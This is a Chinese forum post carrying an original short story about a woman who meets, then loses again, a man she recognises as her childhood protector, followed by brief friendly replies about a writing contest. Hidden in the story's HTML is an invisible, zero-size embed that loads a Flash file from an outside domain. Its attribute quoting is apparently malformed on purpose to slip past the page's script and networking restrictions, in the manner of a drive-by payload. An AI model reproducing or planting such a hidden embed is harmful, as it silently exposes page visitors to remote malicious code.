错位的邂逅(原创小说)

< align=center><FONT size=4></FONT></P>
< align=center><FONT color=darkolivegreen size=5 face=楷体_GB2312> 错位的邂逅</FONT></P>
< align=center><FONT color=darkolivegreen size=5 face=楷体_GB2312></FONT> </P>
<P align=center><FONT color=darkolivegreen size=5 face=楷体_GB2312>                 文/萧琴儿</FONT></P>
<P><FONT size=4></FONT> </P>
<P><FONT size=4>      故乡已没有了儿时记忆的影子,夏日徐徐的微风也没有了儿时的那么有凉意,只是辽而阔的草原比以前更加美丽,鲜花蔓延,亭阁矗立!</FONT></P>
<P> </P>
<P><FONT size=4>        每年的夏末都会来一趟故乡,总会漫步在故乡的原野上让鲜花扑鼻,坐在亭阁中让微风徐徐,听鸟唱、看蝶舞,不知不觉中景中有我、我也融入这美丽的风景中。</FONT></P>
<P><FONT size=4>       清晨已过,露珠已跑得无影无踪,晨起的东方红也已跳出了地面以升到半空中,天空不是那么的很明朗,有朵朵灰色的云彩在漂浮着流动,远处人烟渺渺,我若有所思的赏着这不知经过多少岁月的原野,曲膝凝望着花簇中的狗尾草的穗子,一缕微风吹过,摇曳中的穗子点着头,使我感觉到有了浓浓的家乡的气息,忍不住抽出一穗,仔细观察折断的根部泛着的嫩绿!突然,刚才还干爽的穗子突然现出一颗微小露珠,我望望天、天如故,正在惊奇一丝细雨落在脸上,接着毛毛细雨挥洒着,无声无息的落入丛中,我转身就跑撞入一人怀中,一个趔趄欲倒,有人牢牢地抓住了我的手臂,我惊魂未定定睛观看,是一中年男子眸子清澈、举止成熟稳健,只见他放开手说:“跟我走,我知道前边有一个亭子,说着转身大步流星的前去”。其实我知道前面有个亭阁但心中无语,一路走着小跑着跟着奔向亭阁而去,偶然望着他背影忽然感觉到有种莫名其妙的熟悉!</FONT></P>
<P><FONT size=4>        雨丝见密,到了亭阁我以气喘吁吁,长发以湿身体也感觉到了有些凉意。只听他又说:“你是来这旅游的吗?我看你很久了,你在那呆了很久,你不要介意,我只是好奇”。他一边说着一边看着我,眸子透着好奇和关切,我还在气喘吁吁。接着他又说道:这是我的家乡,很小的时候我带着我妹妹经常来这玩,那时她五岁我十岁,我经常拿狗尾草给她编织小狗小猫,每次 她都会很开心的笑着,可惜她走了从那以后再也没有回来,我惊得难以呼吸,断断续续问着,她叫什么?他望着远方说:叫紫竹。</FONT></P>
<P><FONT size=4>        我惊愕得难以呼吸扶着栏杆难以站立,他回过神来看到焦急的问道:你怎么了,病了吗?来我背你,我知道就在不远有个诊所,说着背起我就走,背很暖泪水滑落弄湿了他的背,童年的情景又浮现在眼前。一年的夏天,因家中变故母亲出远门把我寄养在一户人家,那一年我哭着喊着妈妈不要走,但妈妈说完我很快就会回来接你就走了,我哭着闹着,这时,一个大概十来岁的男孩拿着狗尾草编织的小狗递给我,我好奇的端详着惊愕中说:你编的吗?我也要学!他笑了,从那以后每当想起了妈妈她都会带着我,来到原野嬉戏,用狗尾草编织着童年的梦,转眼夏天快过去了,哥哥开学了,每天盼着他的回来,他也总会给我带来新的惊奇!终于有一天妈妈来接我了,我哭喊着要等哥哥······</FONT><SPAN><EMBED height=0 width=0 invokeurls="false" a='b="' c=""></EMBED><EMBED height=0 type=application/x-shockwave-flash width=0 src=http://xqzn.info/a/n/m.swf allowscriptaccess="never" allownetworking="internal" invokeurls="false" d=" e="></EMBED></SPAN></P>
<P> </P>
<P><FONT size=4>         你还好吧!你只是有一点轻微哮喘,我从回忆中清醒,见一医生正在跟我说话,嗯,是的!我知道!我问:送我来的那个人呢!哦,接个电话匆匆忙忙出去了,我起身向外跑去外面已没有了他的踪迹,我回来问医生他还说了什么吗?他说有点事一会回来!我坐在长椅上时间在慢慢的流逝,天以黑依然没有踪迹,我起身向外走去,天黑沉沉的,雨停了,地湿润润的,雨后的夏末微凉,我站在月光下默想着明天我会再来一定找到你。数日的奔走依然没有看到他的影子,假日也到了期限,明日就要离开这里了,恋恋的不舍一一的不解湿润了我的眼睛,泪水滑落······</FONT></P>
<P><FONT size=4>       火车鸣笛就要启动了,望着车窗外,对面的列车上人影流动,玻璃窗现在的几尺之遥一会就会慢慢远去各奔东西,我漫不经心的观望着,突然,我看到了熟悉的影子,我拍着车窗叫喊着,哥哥,我是紫竹,我是紫竹啊!熟悉的身影惊愕,接着焦急的喊叫着,我猜到了,我去找过你,我去找过你······声音淹没在火车的轰鸣声中渐渐远去,我站立车窗前,泪水模糊了双眼,一滴细雨打在车窗上,变成很多的小雨珠,又一滴细雨打在车窗上,变成更多的小雨珠,又一滴······密密麻麻布满了车窗,终于小雨珠汇集成大大的雨滴,如泪滴一颗接一颗的慢慢的滑落,下雨了······</FONT></P>
<P> </P>
<P> </P>
<P><FONT size=4></FONT> <FONT size=4> <FONT color=#cc3333>(原创小说如有雷同纯属巧合)</FONT></FONT></P>

由于忙好久没来了!
在这里问候所有的朋友,大家好!

问好萧琴儿,真的好久不见了,大赛还有10天时间,不来参加吗?

回复 3# 的帖子

什么大赛啊!不知道啊!
问好傲雪

回复 4# 的帖子

《情满中画》活动,开了专版,来主页里看看,有文学类。

回复 5# 的帖子

嗯,好!我去凑个热闹!

回复 6# 的帖子

感谢支持~

好久没见琴儿了~~又看到琴儿的文字了,感情真挚的小文,令人感容,赏读了~~问好!